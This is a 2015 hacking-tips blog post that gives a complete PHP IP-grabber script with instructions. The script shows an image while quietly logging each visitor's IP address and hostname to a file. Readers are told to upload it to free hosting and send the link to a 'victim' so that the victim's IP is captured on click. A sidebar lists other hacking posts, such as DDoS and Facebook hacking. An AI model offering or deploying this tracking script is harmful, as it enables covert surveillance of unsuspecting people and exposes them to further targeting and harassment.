Friday, 2 January 2015
Using PHP scripts you can grab your friends IP..
So How it works Lets See..
So How to hack your friends IP?
1. Copy the below codes into Notepad and save it as Grab.php (.php is must)
?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = " This Is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>
2. Now make Free account on any of the free web hosting sites Ripway or on My3gb .
3. Now Upload Grab.php to your web hosting site.
4. Copy the link of your uploaded file and send it to victim.
5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
6. Enjoy you are Done !!
Subscribe to:
Post Comments (Atom)
Search
Followers
Popular Posts
-
Bypassing UAC with PowerShell Recently during a Red Team engagement, I got shell access to some user machines using Client Side Att...
-
Note: This Article Is Not For Noobs! Learners Are Welcomed! This Article Is For Educational Purposes Only, Any Misuse Of Information Give...
-
Just follow the steps as given below :- First copy any Image to your C: directory Open cmd by going Start-Run program- type cmd (A...
-
SyntaxNet: Neural Models of Syntax. Installation Running and training SyntaxNet models requires building this package from source. Yo...
-
You Have To Follow These STEPS: 1. Open notepad and paste the following code in it. 2. Change the password in place of (qwe...
-
Go to Start > Run > type " regedit ". Once in regedit go to [HKEY_CURRENT_USER\Software\Microsoft\Window...
-
So Here Is A Trick Now U Can Chat With Your Friend Through Command Prompt.. You need only your friend IP address.. Open Notepad and ...
-
Today our tutorial will talk about Kali Linux Man in the Middle Attack. How to perform man in the middle attack using Kali Linux?we will ...
-
This article is a quick, comprehensive guide on setting up your newly installed KaliLinux2.0 (very attractive new GUI by the way) for secu...
Blog Archive
-
▼
2015
(72)
-
▼
January
(38)
- Posting your Facebook Status Upside Down...
- Is Free Antivirus Really Good?
- QUESTIONS THAT CAN COME IN YOUR C PROGRAMMING TEST.
- Basic C PROGRAMMING LPU
- Create Facebook Page without Name-How to Guide
- Refresh Your Full Computer By Just One Click
- Making own Simple Port Scanner
- Hacking With PRORAT...
- Use Google as A proxy..?
- Hacking A Iphone Passcode....
- How to Create folder named CON?
- Skip the Annoying "Use the Web service to find the...
- HOW HACKERS GET CAUGHT.
- HACK A WEBSITE WITH HTML CODING...
- Magic In Windows..
- Compress 1 GB into 10 mb
- Online chat tricks..
- Make Your own speaking programme with Batch file a...
- Programme to annoy anyone one..
- DDOS ATTACK MANUALL
- HOW TO BLOCK YOUR ENEMY'S SIM CARD
- HOW TO CHANGE THE ICON OF YOUR PEN DRIVE
- Disable the “Send To” Folder on the Windows Explor...
- WMIC commands for Auditor and Hacker
- How to "Delete administrator Password" without any...
- How To Use Mobile Camara As A Webcam
- Setting A Video As Desktop Wallpaper..
- Send Coloured Message on Facebook...
- How To Stop Someone's Internet Access..
- Facebook Hacking
- How To Hide Drives in Windows?
- Advance Matrix Efect Using Notepad...
- How To Grab Your Friend IP
- HAVE YOU DOWNLOADED TORRENT FILE WITH IDM
- Want to crack BIOS PASSWORD...
- Some Windows Amazing Tricks
- Chat With Friends Through Command Prompt(CMD)..
- Shutdown Your PC by Timer...
-
▼
January
(38)
Text Widget
Powered by Blogger.
0 comments:
Post a Comment